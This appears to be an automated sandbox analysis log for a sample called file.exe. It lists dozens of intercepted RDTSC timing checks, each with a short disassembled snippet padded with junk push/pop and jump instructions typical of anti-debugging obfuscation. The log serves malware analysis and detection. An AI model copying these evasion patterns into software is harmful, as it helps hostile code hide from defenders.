Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8ABFC second address: A8AC16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD25h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8B101 second address: A8B109 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8B650 second address: A8B680 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F4540B7FD20h 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F4540B7FD16h 0x00000016 je 00007F4540B7FD16h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8B680 second address: A8B689 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8BBF0 second address: A8BBF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8BBF4 second address: A8BBFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A90EC2 second address: A90ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jo 00007F4540B7FD16h 0x0000000e jnp 00007F4540B7FD16h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A90067 second address: A90085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F45412F2586h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A90085 second address: A90089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A90089 second address: A90093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9066E second address: A9068A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4540B7FD22h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9068A second address: A9068E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A90831 second address: A90850 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD29h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A90850 second address: A90854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E043 second address: A9E04A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9C3B5 second address: A9C3E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45412F2586h 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F45412F257Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9C3E1 second address: A9C3E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9C3E5 second address: A9C433 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F45412F2582h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F45412F2588h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 jmp 00007F45412F2586h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9C433 second address: A9C443 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD1Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9C443 second address: A9C44E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9C9F4 second address: A9CA00 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9CB68 second address: A9CBA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45412F2584h 0x00000009 jmp 00007F45412F2586h 0x0000000e popad 0x0000000f pushad 0x00000010 jc 00007F45412F2576h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9CBA9 second address: A9CBAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9CBAD second address: A9CBCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F257Ch 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c jbe 00007F45412F2596h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA0436 second address: AA043B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA702B second address: AA7036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F45412F2576h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA7036 second address: AA704C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F4540B7FD16h 0x00000009 pushad 0x0000000a popad 0x0000000b je 00007F4540B7FD16h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA704C second address: AA705F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F45412F2580h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA72E0 second address: AA72FD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4540B7FD16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F4540B7FD20h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB8937 second address: AB893B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB893B second address: AB8955 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD26h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABEF40 second address: ABEF46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABEF46 second address: ABEF54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F4540B7FD18h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABEF54 second address: ABEF62 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F45412F2576h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABEF62 second address: ABEF70 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC5550 second address: AC5554 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC5554 second address: AC555C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC555C second address: AC5571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F257Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC842B second address: AC8456 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F4540B7FD16h 0x00000012 jmp 00007F4540B7FD29h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC8456 second address: AC845C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC8290 second address: AC8296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC8296 second address: AC829A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC829A second address: AC82B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F4540B7FD1Ch 0x0000000e jl 00007F4540B7FD16h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACE0B6 second address: ACE0BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD350D second address: AD3513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD3513 second address: AD3517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD367E second address: AD3698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4540B7FD26h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD3698 second address: AD369C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD3B01 second address: AD3B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F4540B7FD1Bh 0x0000000b jmp 00007F4540B7FD26h 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD3B29 second address: AD3B37 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jg 00007F45412F2576h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD3B37 second address: AD3B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD3B3D second address: AD3B41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD3B41 second address: AD3B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD3CB0 second address: AD3CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F45412F2576h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F45412F257Ah 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD3CCB second address: AD3CDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4540B7FD1Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD3CDC second address: AD3CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD3CE0 second address: AD3CE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD8F18 second address: AD8F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD8F20 second address: AD8F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD8AF1 second address: AD8AF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEBF8E second address: AEBF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEBF92 second address: AEBF96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEBF96 second address: AEBF9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEBF9C second address: AEBFA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEBFA2 second address: AEBFA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEBFA8 second address: AEBFB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F45412F2576h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEBE00 second address: AEBE0A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4540B7FD16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEBE0A second address: AEBE33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 ja 00007F45412F257Ch 0x0000000e jmp 00007F45412F257Bh 0x00000013 js 00007F45412F257Eh 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE46F6 second address: AE4709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4540B7FD16h 0x0000000a jl 00007F4540B7FD16h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFA523 second address: AFA527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFA527 second address: AFA531 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B132CA second address: B132DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F45412F257Bh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B132DC second address: B132E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B132E9 second address: B132ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B135E9 second address: B135EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B138BE second address: B138C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B138C2 second address: B138C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B138C8 second address: B1390F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F257Dh 0x00000007 jnp 00007F45412F257Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F45412F2580h 0x00000015 jmp 00007F45412F2583h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1390F second address: B13915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B13C3B second address: B13C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F45412F2576h 0x0000000f js 00007F45412F2576h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B13C50 second address: B13C56 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B13C56 second address: B13C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jnp 00007F45412F2576h 0x0000000d pop esi 0x0000000e jns 00007F45412F258Fh 0x00000014 popad 0x00000015 push ebx 0x00000016 pushad 0x00000017 jmp 00007F45412F257Fh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0DF9 second address: 51C0DFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0DFD second address: 51C0E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0E03 second address: 51C0E19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bh, ah 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0E19 second address: 51C0E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F45412F257Bh 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F45412F2585h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0E42 second address: 51C0E7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F4540B7FD1Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 call 00007F4540B7FD1Dh 0x00000019 pop esi 0x0000001a mov ecx, ebx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0E7C second address: 51C0E83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0CFD second address: 51B0D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0D01 second address: 51B0D05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0D05 second address: 51B0D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190134 second address: 519013A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 519013A second address: 519013F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 519013F second address: 519017E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45412F257Ah 0x00000009 and esi, 1181A548h 0x0000000f jmp 00007F45412F257Bh 0x00000014 popfd 0x00000015 mov bh, ch 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push esp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F45412F2587h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 519017E second address: 51901A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51901A6 second address: 5190221 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2584h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F45412F2580h 0x00000010 push dword ptr [ebp+04h] 0x00000013 jmp 00007F45412F2580h 0x00000018 push dword ptr [ebp+0Ch] 0x0000001b pushad 0x0000001c mov eax, 1B601C9Dh 0x00000021 pushfd 0x00000022 jmp 00007F45412F257Ah 0x00000027 adc ecx, 5D0D79F8h 0x0000002d jmp 00007F45412F257Bh 0x00000032 popfd 0x00000033 popad 0x00000034 push dword ptr [ebp+08h] 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F45412F2580h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190221 second address: 5190227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
